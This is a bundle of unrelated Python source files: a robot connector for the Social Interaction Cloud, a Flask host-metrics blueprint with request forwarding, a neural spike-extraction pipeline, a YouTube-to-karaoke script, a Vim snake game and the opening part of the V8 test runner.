basic_connector.py
|
from enum import Enum
from functools import partial
from queue import Queue
from threading import Condition, Event, Thread
from time import sleep
from social_interaction_cloud.abstract_connector import AbstractSICConnector
class RobotPosture(Enum):
STAND = 'Stand'
STANDINIT = 'StandInit'
STANDZERO = 'StandZero'
CROUCH = 'Crouch'
SIT = 'Sit' # only for Nao
SITONCHAIR = 'SitOnChair' # only for Nao
SITRELAX = 'SitRelax' # only for Nao
LYINGBELLY = 'LyingBelly' # only for Nao
LYINGBACK = 'LyingBack' # only for Nao
UNKNOWN = 'Unknown' # this is not a valid posture
class BasicSICConnector(AbstractSICConnector):
"""
Basic implementation of AbstractSICConnector. It serves a connector to the Social Interaction Cloud.
The base mechanism is that a callback function can be registered for each robot action. When the action returns a
result (e.g. a ActionDone event) the callback is called once and removed. Only for touch and vision events a
persistent callback can be registered.
"""
def __init__(self, server_ip: str, dialogflow_language: str = None,
dialogflow_key_file: str = None, dialogflow_agent_id: str = None):
"""
:param server_ip: IP address of Social Interaction Cloud server
:param dialogflow_language: the full language key to use in Dialogflow (e.g. en-US)
:param dialogflow_key_file: path to Google's Dialogflow key file (JSON)
:param dialogflow_agent_id: ID number of Dialogflow agent to be used (project ID)
"""
self.__listeners = {}
self.__conditions = []
self.__vision_listeners = {}
self.__touch_listeners = {}
self.robot_state = {'posture': RobotPosture.UNKNOWN,
'is_awake': False,
'battery_charge': 100,
'is_charging': False,
'hot_devices': []}
super(BasicSICConnector, self).__init__(server_ip=server_ip)
if dialogflow_language and dialogflow_key_file and dialogflow_agent_id:
self.enable_service('intent_detection')
sleep(1) # give the service some time to load
self.set_dialogflow_language(dialogflow_language)
self.set_dialogflow_key(dialogflow_key_file)
self.set_dialogflow_agent(dialogflow_agent_id)
###########################
# Event handlers #
###########################
def on_event(self, event: str) -> None:
self.__notify_listeners(event)
self.__notify_touch_listeners(event)
def on_posture_changed(self, posture: str) -> None:
self.__notify_listeners('onPostureChanged', posture)
self.robot_state['posture'] = RobotPosture[posture.upper()]
def on_audio_language(self, language_key: str) -> None:
self.__notify_listeners('onAudioLanguage', language_key)
def on_audio_intent(self, detection_result: dict) -> None:
self.__notify_listeners('onAudioIntent', detection_result)
def on_new_audio_file(self, audio_file: str) -> None:
self.__notify_listeners('onNewAudioFile', audio_file)
def on_new_picture_file(self, picture_file: str) -> None:
if not self.__vision_listeners:
self.stop_looking()
self.__notify_listeners('onNewPictureFile', picture_file)
def on_person_detected(self) -> None:
self.__notify_vision_listeners('onPersonDetected')
def on_face_recognized(self, identifier: str) -> None:
self.__notify_vision_listeners('onFaceRecognized', identifier)
def on_emotion_detected(self, emotion: str) -> None:
self.__notify_vision_listeners('onEmotionDetected', emotion)
def on_battery_charge_changed(self, percentage: int) -> None:
self.__notify_listeners('onBatteryChargeChanged', percentage)
self.robot_state['battery_charge'] = percentage
def on_charging_changed(self, is_charging: bool) -> None:
self.__notify_listeners('onChargingChanged', is_charging)
self.robot_state['is_charging'] = is_charging
def on_hot_device_detected(self, hot_devices: list) -> None:
self.__notify_listeners('onHotDeviceDetected', hot_devices)
self.robot_state['hot_devices'] = hot_devices
def on_robot_motion_recording(self, motion: bytes) -> None:
self.__notify_listeners('onRobotMotionRecording', motion)
def on_browser_button(self, button: str) -> None:
self.__notify_listeners('onBrowserButton', button)
###########################
# Speech Recognition #
###########################
def speech_recognition(self, context: str, max_duration: int, callback: callable = None) -> None:
"""
        Initiate a speech recognition attempt via Google's Dialogflow, using a context.
        For more information on contexts see: https://cloud.google.com/dialogflow/docs/contexts-overview
        The robot will stream audio to Dialogflow for at most max_duration seconds to recognize something.
The result (or a 'fail') is returned via the callback function.
:param context: Google's Dialogflow context label (str)
:param max_duration: maximum time to listen in seconds (int)
:param callback: callback function that will be called when a result (or fail) becomes available
:return:
"""
enhanced_callback, fail_callback, lock = self.__build_speech_recording_callback(callback)
self.__register_listener('onAudioIntent', enhanced_callback)
self.__register_listener('IntentDetectionDone', fail_callback)
Thread(target=self.__recognizing, args=(context, lock, max_duration)).start()
def record_audio(self, duration: int, callback: callable = None) -> None:
"""
        Records audio for the given duration in seconds. The location of the audio file is returned via the callback function.
        :param duration: number of seconds of audio that will be recorded.
:param callback: callback function that will be called when the audio is recorded.
:return:
"""
success_callback, _, lock = self.__build_speech_recording_callback(callback)
self.__register_listener('onNewAudioFile', success_callback)
Thread(target=self.__recording, args=(lock, duration)).start()
def __recognizing(self, context: str, lock: Event, max_duration: int) -> None:
self.stop_listening()
self.set_dialogflow_context(context)
self.start_listening(max_duration)
lock.wait()
def __recording(self, lock: Event, max_duration: int) -> None:
self.stop_listening()
self.set_record_audio(True)
self.start_listening(max_duration)
lock.wait()
self.set_record_audio(False)
@staticmethod
def __build_speech_recording_callback(embedded_callback: callable = None):
lock = Event()
def success_callback(*args):
if embedded_callback:
embedded_callback(*args)
lock.set()
def fail_callback():
if not lock.is_set():
if embedded_callback:
embedded_callback(None)
lock.set()
return success_callback, fail_callback, lock
###########################
# Vision #
###########################
def take_picture(self, callback: callable = None) -> None:
"""
Take a picture. Location of the stored picture is returned via callback.
:param callback:
:return:
"""
if not self.__vision_listeners:
self.stop_looking()
self.start_looking(0)
self.__register_listener('onNewPictureFile', callback)
super(BasicSICConnector, self).take_picture()
def start_face_recognition(self, callback: callable = None) -> None:
"""
Start face recognition. Each time a face is detected, the callback function is called with the recognition result.
:param callback:
:return:
"""
self.__start_vision_recognition('onFaceRecognized', callback)
def stop_face_recognition(self) -> None:
"""
Stop face recognition.
:return:
"""
self.__stop_vision_recognition('onFaceRecognized')
def start_people_detection(self, callback: callable = None) -> None:
"""
Start people detection. Each time a person is detected, the callback function is called.
:param callback:
:return:
"""
self.__start_vision_recognition('onPersonDetected', callback)
def stop_people_detection(self) -> None:
"""
Stop people detection.
:return:
"""
self.__stop_vision_recognition('onPersonDetected')
def start_emotion_detection(self, callback: callable = None) -> None:
"""
Start emotion detection. Each time an emotion becomes available the callback function is called with the emotion.
:param callback:
:return:
"""
self.__start_vision_recognition('onEmotionDetected', callback)
def stop_emotion_detection(self) -> None:
"""
Stop emotion detection.
:return:
"""
self.__stop_vision_recognition('onEmotionDetected')
def __start_vision_recognition(self, event: str, callback: callable = None) -> None:
if not self.__vision_listeners:
self.stop_looking()
self.start_looking(0)
self.__register_vision_listener(event, callback)
def __stop_vision_recognition(self, event: str) -> None:
self.__unregister_vision_listener(event)
if not self.__vision_listeners:
self.stop_looking()
###########################
# Touch #
###########################
def subscribe_touch_listener(self, touch_event: str, callback: callable) -> None:
"""
Subscribe a touch listener. The callback function will be called each time the touch_event becomes available.
:param touch_event:
:param callback:
:return:
"""
self.__touch_listeners[touch_event] = callback
def unsubscribe_touch_listener(self, touch_event: str) -> None:
"""
Unsubscribe touch listener.
:param touch_event:
:return:
"""
del self.__touch_listeners[touch_event]
###########################
# Robot actions #
###########################
def set_language(self, language_key: str, callback: callable = None) -> None:
if callback:
self.__register_listener('LanguageChanged', callback)
super(BasicSICConnector, self).set_language(language_key)
def set_idle(self, callback: callable = None) -> None:
if callback:
self.__register_listener('SetIdle', callback)
super(BasicSICConnector, self).set_idle()
def set_non_idle(self, callback: callable = None) -> None:
if callback:
self.__register_listener('SetNonIdle', callback)
super(BasicSICConnector, self).set_non_idle()
def say(self, text: str, callback: callable = None) -> None:
if callback:
self.__register_listener('TextDone', callback)
super(BasicSICConnector, self).say(text)
def say_animated(self, text: str, callback: callable = None) -> None:
if callback:
self.__register_listener('TextDone', callback)
super(BasicSICConnector, self).say_animated(text)
def do_gesture(self, gesture: str, callback: callable = None) -> None:
if callback:
self.__register_listener('GestureDone', callback)
super(BasicSICConnector, self).do_gesture(gesture)
def play_audio(self, audio_file: str, callback: callable = None) -> None:
if callback:
self.__register_listener('PlayAudioDone', callback)
super(BasicSICConnector, self).play_audio(audio_file)
def set_eye_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('EyeColourDone', callback)
super(BasicSICConnector, self).set_eye_color(color)
def set_ear_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('EarColourDone', callback)
super(BasicSICConnector, self).set_ear_color(color)
def set_head_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('HeadColourDone', callback)
super(BasicSICConnector, self).set_head_color(color)
def turn_left(self, small: bool = True, callback: callable = None) -> None:
if callback:
self.__register_listener(('Small' if small else '') + 'TurnDone', callback)
super(BasicSICConnector, self).turn_left(small)
def turn_right(self, small: bool = True, callback: callable = None) -> None:
if callback:
self.__register_listener(('Small' if small else '') + 'TurnDone', callback)
super(BasicSICConnector, self).turn_right(small)
def wake_up(self, callback: callable = None) -> None:
if callback:
self.__register_listener('WakeUpDone', callback)
super(BasicSICConnector, self).wake_up()
def rest(self, callback: callable = None) -> None:
if callback:
self.__register_listener('RestDone', callback)
super(BasicSICConnector, self).rest()
def set_breathing(self, enable: bool, callback: callable = None) -> None:
if callback:
if enable:
self.__register_listener('BreathingEnabled', callback)
else:
self.__register_listener('BreathingDisabled', callback)
super(BasicSICConnector, self).set_breathing(enable)
    def go_to_posture(self, posture: RobotPosture, speed: int = 100, callback: callable = None) -> None:
        """
        The robot will try up to 3 times to reach the given posture.
        go_to_posture's callback returns a bool indicating whether the posture was successfully reached.
        """
if callback:
self.__register_listener('GoToPostureDone', partial(self.__posture_callback,
target_posture=posture,
embedded_callback=callback))
super(BasicSICConnector, self).go_to_posture(posture.value, speed)
    def __posture_callback(self, target_posture: RobotPosture, embedded_callback: callable) -> None:
if self.robot_state['posture'] == target_posture: # if posture was successfully reached
embedded_callback(True) # call the listener to signal a success
else: # if the posture was not reached
embedded_callback(False) # call the listener to signal a failure
def set_stiffness(self, joints: list, stiffness: int, duration: int = 1000, callback: callable = None) -> None:
if callback:
self.__register_listener('SetStiffnessDone', callback)
super(BasicSICConnector, self).set_stiffness(joints, stiffness, duration)
def play_motion(self, motion, callback: callable = None) -> None:
if callback:
self.__register_listener('PlayMotionDone', callback)
super(BasicSICConnector, self).play_motion(motion)
def start_record_motion(self, joint_chains: list, framerate: int = 5, callback: callable = None) -> None:
if callback:
self.__register_listener('RecordMotionStarted', callback)
super(BasicSICConnector, self).start_record_motion(joint_chains, framerate)
def stop_record_motion(self, callback: callable = None) -> None:
if callback:
self.__register_listener('onRobotMotionRecording', callback)
super(BasicSICConnector, self).stop_record_motion()
def browser_show(self, html: str, callback: callable = None) -> None:
super(BasicSICConnector, self).browser_show(html)
###########################
# Robot action Listeners #
###########################
def subscribe_condition(self, condition: Condition) -> None:
"""
Subscribe a threading.Condition object that will be notified each time a registered callback is called.
:param condition: Condition object that will be notified
:return:
"""
self.__conditions.append(condition)
def unsubscribe_condition(self, condition: Condition) -> None:
"""
Unsubscribe the threading.Condition object.
:param condition: Condition object to unsubscribe
:return:
"""
if condition in self.__conditions:
self.__conditions.remove(condition)
def __notify_conditions(self) -> None:
for condition in self.__conditions:
with condition:
condition.notify()
def __register_listener(self, event: str, callback: callable) -> None:
if event in self.__listeners:
self.__listeners[event].put(callback)
else:
queue = Queue()
queue.put(callback)
self.__listeners[event] = queue
def __register_vision_listener(self, event: str, callback: callable) -> None:
self.__vision_listeners[event] = callback
def __unregister_vision_listener(self, event: str) -> None:
del self.__vision_listeners[event]
def __notify_listeners(self, event: str, *args) -> None:
# If there is a listener for the event
if event in self.__listeners and not self.__listeners[event].empty():
            # only the first one will be notified
listener = self.__listeners[event].get()
# notify the listener
listener(*args)
self.__notify_conditions()
def __notify_vision_listeners(self, event: str, *args) -> None:
if event in self.__vision_listeners:
listener = self.__vision_listeners[event]
listener(*args)
self.__notify_conditions()
def __notify_touch_listeners(self, event: str, *args) -> None:
if event in self.__touch_listeners:
listener = self.__touch_listeners[event]
listener(*args)
self.__notify_conditions()
###########################
# Management #
###########################
def start(self) -> None:
self.__clear_listeners()
super(BasicSICConnector, self).start()
def stop(self) -> None:
self.__clear_listeners()
super(BasicSICConnector, self).stop()
def __clear_listeners(self) -> None:
self.__listeners = {}
self.__conditions = []
self.__vision_listeners = {}
self.__touch_listeners = {}
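
# --- Hypothetical usage sketch (not part of the connector itself). ---
# Assumes a Social Interaction Cloud server is reachable at 127.0.0.1, that
# start() returns once the connection is set up, and that the touch event
# name below exists on the target robot.
if __name__ == '__main__':
    def on_text_done(*args):
        print('say() finished')

    connector = BasicSICConnector('127.0.0.1')
    connector.start()
    # One-shot callback: removed again after the first TextDone event.
    connector.say('Hello world', callback=on_text_done)
    # Persistent callback: fires on every matching touch event.
    connector.subscribe_touch_listener('MiddleTactilTouched',
                                       lambda *args: print('head touched'))
    sleep(5)
    connector.stop()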
|
server.py
|
import logging
from multiprocessing import Process, Queue
import requests
from flask import Blueprint, Response, request
from hoststats.collection import collect_metrics
from hoststats.stats import FORWARD_HEADER, SERVER_PORT
metrics_api = Blueprint("metrics_api", __name__)
metrics_process = None
kill_queue = None
result_queue = None
def _get_forward_host():
for key, value in request.headers.items():
if key.lower() == FORWARD_HEADER.lower():
return value
return None
def _is_forward_request():
host = _get_forward_host()
return bool(host)
def _do_forward_request():
# Note, Flask's request.host field contains the port too
original_url = request.url
target_host = _get_forward_host()
forward_url = original_url.replace(
request.host, f"{target_host}:{SERVER_PORT}"
)
# Strip out forward header and host header
forward_headers = {
k: v
for (k, v) in request.headers
if k.lower() not in [FORWARD_HEADER.lower(), "host"]
}
logging.debug(f"Forwarding request from {original_url} to {forward_url}")
logging.debug(f"Forwarding headers: {forward_headers}")
# Make the forward request
resp = requests.request(
method=request.method,
url=forward_url,
headers=forward_headers,
)
# Strip out undesired headers from the forwarded response
excluded_headers = [
"content-encoding",
"content-length",
"transfer-encoding",
"connection",
]
headers = [
(name, value)
for (name, value) in resp.headers.items()
if name.lower() not in excluded_headers
]
# Build Flask response from forwarded response
return Response(resp.content, resp.status_code, headers)
@metrics_api.route("/ping")
def ping():
if _is_forward_request():
return _do_forward_request()
return "PONG"
@metrics_api.route("/start")
def start_recording():
if _is_forward_request():
return _do_forward_request()
global metrics_process
global kill_queue
global result_queue
if metrics_process is not None:
msg = "Not starting metrics recording, already running"
        logging.warning(msg)
return msg
kill_queue = Queue()
result_queue = Queue()
metrics_process = Process(
target=collect_metrics, args=(kill_queue, result_queue)
)
metrics_process.start()
return "hoststats started"
@metrics_api.route("/stop")
def stop_recording():
if _is_forward_request():
return _do_forward_request()
global metrics_process
global kill_queue
global result_queue
if metrics_process is None:
msg = "Not stopping metrics recording, not running"
        logging.warning(msg)
return msg
kill_queue.put("die")
    # Get the results before we join the process; otherwise, if the queue
    # buffer fills up, the program will deadlock
result_json = result_queue.get()
metrics_process.join()
metrics_process = None
kill_queue = None
result_queue = None
return result_json
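
# --- Hypothetical local test harness (not part of hoststats itself). ---
# A minimal sketch, assuming Flask is installed, showing how the metrics_api
# blueprint could be mounted on an app and driven over HTTP; the real server
# wiring in hoststats may differ. SERVER_PORT is assumed to be the port the
# collector listens on.
if __name__ == "__main__":
    from flask import Flask

    app = Flask(__name__)
    app.register_blueprint(metrics_api)

    # GET /start begins collection in a child process, GET /stop joins it and
    # returns the collected metrics as JSON, and GET /ping is a liveness check.
    app.run(host="0.0.0.0", port=SERVER_PORT)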
|
mp_extract.py
|
# JN 2015-02-13 refactoring
from __future__ import absolute_import, print_function, division
from collections import defaultdict
from multiprocessing import Process, Queue, Value
import numpy as np
np.seterr(all='raise')
import tables
from .. import DefaultFilter
from .tools import ExtractNcsFile, OutFile, read_matfile
from .extract_spikes import extract_spikes
def save(q, ctarget):
openfiles = {}
saved = 0
pending_jobs = defaultdict(dict)
last_saved_count = defaultdict(lambda : -1)
all_data = []
while saved < ctarget:
inp = q.get()
job = inp[0]
datatuple = inp[1]
ind = len(all_data)
all_data.append(datatuple)
job.update(all_data_ind=ind)
jname = job['name']
this_name_pending_jobs = pending_jobs[jname]
jcount = job['count']
this_name_pending_jobs[jcount] = job
print('Job name: {} pending jobs: {} jnow: {}'.format(jname,
this_name_pending_jobs.keys(),
jcount))
while last_saved_count[jname] + 1 in this_name_pending_jobs:
sjob = this_name_pending_jobs[last_saved_count[jname] + 1]
data = all_data[sjob['all_data_ind']]
            if sjob['name'] not in openfiles:
spoints = data[0][0].shape[1]
openfiles[sjob['name']] = OutFile(sjob['name'], sjob['filename'],
spoints, sjob['destination'])
print('saving {}, count {}'.format(sjob['name'], sjob['count']))
openfiles[sjob['name']].write(data)
all_data[sjob['all_data_ind']] = None
last_saved_count[jname] = sjob['count']
del this_name_pending_jobs[sjob['count']]
saved += 1
for fid in openfiles.values():
fid.close()
print('Save exited')
def work(q_in, q_out, count, target):
filters = {}
while count.value < target:
with count.get_lock():
count.value += 1
inp = q_in.get()
job = inp[0]
datatuple = inp[1]
ts = datatuple[2]
        if ts not in filters:
filters[ts] = DefaultFilter(ts)
filt = filters[ts]
result = extract_spikes(datatuple[0],
datatuple[1],
ts, filt)
q_out.put((job, result))
print('Work exited')
def read(jobs, q):
"""
writes to q; q is read by worker processes
"""
openfiles = {}
for job in jobs:
jname = job['name']
if ('is_h5file' in job.keys()) and job['is_h5file']:
if jname not in openfiles:
openfiles[jname] = tables.open_file(job['filename'], 'r')
if openfiles[jname].root.data.ndim == 1:
fdata = openfiles[jname].root.data[job['start']:job['stop']]
else:
raise Warning('Data has wrong number of dimensions')
fdata = fdata.ravel()
sr = 32000.
ts = 1/sr
# here we need to shift the data according to job['start']
atimes = np.linspace(0, fdata.shape[0]/(sr/1000), fdata.shape[0])
atimes += job['start']/(sr/1000)
data = (fdata, atimes, ts)
job.update(filename='data_' + jname + '.h5')
elif 'is_matfile' in job.keys():
if job['is_matfile']:
fname = job['filename']
print('Reading from matfile ' + fname)
data = read_matfile(fname)
if job['scale_factor'] != 1:
print('Rescaling matfile data by {:.4f}'.
format(job['scale_factor']))
data = (data[0] * job['scale_factor'],
data[1],
data[2])
job.update(filename='data_' + jname + '.h5')
else:
if jname not in openfiles:
openfiles[jname] = ExtractNcsFile(job['filename'], job['reference'])
print('Read {} {: 7d} {: 7d}'.format(jname, job['start'], job['stop']))
data = openfiles[jname].read(job['start'], job['stop'])
job.update(filename='data_' + jname + '.h5')
q.put((job, data))
print('Read exited')
def mp_extract(jobs, nWorkers):
procs = []
ctarget = len(jobs)
count = Value('i', 0)
q_read = Queue(5)
q_work = Queue()
# start the reading process
p = Process(target=read, args=[jobs, q_read])
p.daemon = True
p.start()
# start the worker processes
for i in range(nWorkers):
p = Process(target=work, args=[q_read, q_work, count, ctarget])
p.daemon = True
p.start()
procs.append(p)
# start the saver process
p = Process(target=save, args=[q_work, ctarget])
p.daemon = True
p.start()
p.join()
for p in procs:
p.join()
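
# --- Hypothetical usage sketch (not part of the original module). ---
# The expected job-dict keys are inferred from read() and save() above:
# 'name', 'filename', 'start', 'stop', 'reference', 'count' and 'destination',
# plus the optional 'is_h5file'/'is_matfile'/'scale_factor' flags. The file
# name and sample range below are made up for illustration.
if __name__ == '__main__':
    example_jobs = [{'name': 'CSC1',
                     'filename': 'CSC1.ncs',
                     'reference': None,
                     'start': 0,
                     'stop': 512 * 1000,
                     'count': 0,
                     'destination': '.'}]
    mp_extract(example_jobs, nWorkers=2)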
|
__main__.py
|
import youtube_dl.extractor
import youtube_dl
import os
import pathlib
import tempfile
import sys
import re
import multiprocessing
from tqdm import tqdm
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def clean_path(fname: str) -> str:
fname = re.sub("/", "\\/", fname)
    fname = re.sub(r"\.", "\\.", fname)
if os.path.normpath(fname) != fname:
raise ValueError(fname)
s = os.path.split(fname)
if s != ("", fname):
raise ValueError(fname)
return fname
def process(url):
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from spleeter.separator import Separator
import logging
logging.basicConfig(filename='spleeter.log', level=logging.INFO)
tmpfile = tempfile.mktemp(suffix=".m4a", dir="tmp")
try:
sys.stdout = open("log.txt", "w")
sys.stderr = open("err.txt", "w")
ydl_opts = {"outtmpl": tmpfile,
"format": "m4a", "max_downloads": 1}
print(tmpfile)
fname = None
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([url])
info = ydl.get_info_extractor("Youtube").extract(url)
fname = clean_path(info["title"])
# os.makedirs(info["title"])
os.rename(tmpfile, fname + ".m4a")
tmpfile = fname + ".m4a"
separator = Separator("spleeter:2stems-16kHz")
separator.separate_to_file(tmpfile, "output",
codec="mp3",
bitrate="196k")
finally:
if os.path.exists(tmpfile):
os.unlink(tmpfile)
def entrypoint():
input_data = open(sys.argv[1]).readlines()
base = os.path.expanduser(os.path.join("~", "Music", "karaoker"))
tmpdir = os.path.join(base, "tmp")
os.makedirs(base, exist_ok=True)
os.makedirs(tmpdir, exist_ok=True)
os.chdir(base)
errors = open("errors.txt", "w")
for url in tqdm(input_data):
url = url.strip()
if url:
p = multiprocessing.Process(target=process, args=(url,))
p.start()
p.join()
if p.exitcode != 0:
                errors.write(url + "\n")
if __name__ == "__main__":
entrypoint()
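
# Example invocation (hypothetical, inferred from entrypoint() above): put one
# YouTube URL per line in a text file and pass its path as the first argument,
# e.g. `python -m <package> urls.txt` (the package name is not shown here).
# Downloads and spleeter output land under ~/Music/karaoker, and URLs whose
# worker process exits non-zero are appended to ~/Music/karaoker/errors.txt.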
|
snake.py
|
# adapted from https://gist.github.com/sanchitgangwar/2158084
from random import randint
from time import sleep
import sys, vim
from threading import Thread, Lock
sys.excepthook = lambda *args: sys.stderr.write('error %s, %s, %s\n' % args) and sys.stderr.flush()
buf = vim.current.buffer
key = 'right'
prevKey = 'right'
score = 0
snake = [[4,10], [4,9], [4,8]] # Initial snake co-ordinates
food = [10,20] # First food co-ordinates
lock = Lock()
def run_game():
global key, prevKey, score, snake, food
timeout = None
addstr(food[0], food[1], '*') # Prints the food
while key != 'esc':
lock.acquire()
if key == 'space': # If SPACE BAR is pressed, wait for another
key = None
while key != 'space':
lock.release()
sleep(timeout)
lock.acquire()
key = prevKey
lock.release()
continue
# Calculates the new coordinates of the head of the snake. NOTE: len(snake) increases.
# This is taken care of later at [1].
snake.insert(0, [snake[0][0] + (key == 'down' and 1) + (key == 'up' and -1), snake[0][1] + (key == 'left' and -1) + (key == 'right' and 1)])
# If snake crosses the boundaries, make it enter from the other side
if snake[0][0] == 0: snake[0][0] = 18
if snake[0][1] == 0: snake[0][1] = 58
if snake[0][0] == 19: snake[0][0] = 1
if snake[0][1] == 59: snake[0][1] = 1
# Exit if snake crosses the boundaries (Uncomment to enable)
#if snake[0][0] == 0 or snake[0][0] == 19 or snake[0][1] == 0 or snake[0][1] == 59: break
l = len(snake)
# If snake runs over itself
trail = snake[1:]
if snake[0] in trail:
lock.release()
break
timeout = 0.001 * (150 - (l / 5 + l /10) % 120) # Increases the speed of Snake as its length increases
prevKey = key # Previous key pressed
vim.trigger('update-screen')
lock.release()
sleep(timeout)
lock.acquire()
vim.trigger('end-game')
lock.release()
def addstr(lnum, cnum, string):
line = buf[lnum]
line = line[0:cnum] + string + line[cnum + len(string):]
buf[lnum] = line
def update():
global key, prevKey, score, snake, food
lock.acquire()
if snake[0] == food: # When snake eats the food
food = []
score += 1
while food == []:
food = [randint(1, 18), randint(1, 58)] # Calculating next food's coordinates
if food in snake: food = []
addstr(food[0], food[1], '*')
else:
last = snake.pop() # [1] If it does not eat the food, length decreases
addstr(last[0], last[1], ' ')
addstr(snake[0][0], snake[0][1], '#')
addstr(0, 2, 'Score : ' + str(score) + ' ') # Printing 'Score' and
addstr(0, 27, ' SNAKE / MOVEMENTs(hjkl) EXIT(i) PAUSE(space) ')
lock.release()
def end():
lock.acquire()
buf[:] = None
buf.append("Score - " + str(score))
buf.append("http://bitemelater.in")
lock.release()
def keypress(k):
global key
lock.acquire()
key = k
lock.release()
def start():
game = Thread(target=run_game)
game.daemon = True
game.start()
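
# --- Integration notes (hypothetical, inferred from the code above). ---
# The embedding Vim plugin is expected to:
#   * call start() once to launch the game thread,
#   * forward key presses by calling keypress('left'/'right'/'up'/'down'/
#     'space'/'esc'), e.g. from the hjkl/space/i mappings named in the
#     status line drawn by update(),
#   * redraw on the custom 'update-screen' event by calling update(), and
#     call end() when 'end-game' fires.
# Note: vim.trigger() is assumed to be provided by the surrounding plugin;
# it is not part of the stock Vim Python API.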
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
import utils
logger = logging.getLogger('testrunner')
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.flaky_crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
case.duration = (datetime.now() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == "dontcare":
self.flaky_failed.append(output)
if output.HasCrashed():
self.flaky_crashed += 1
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def Starting(self):
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
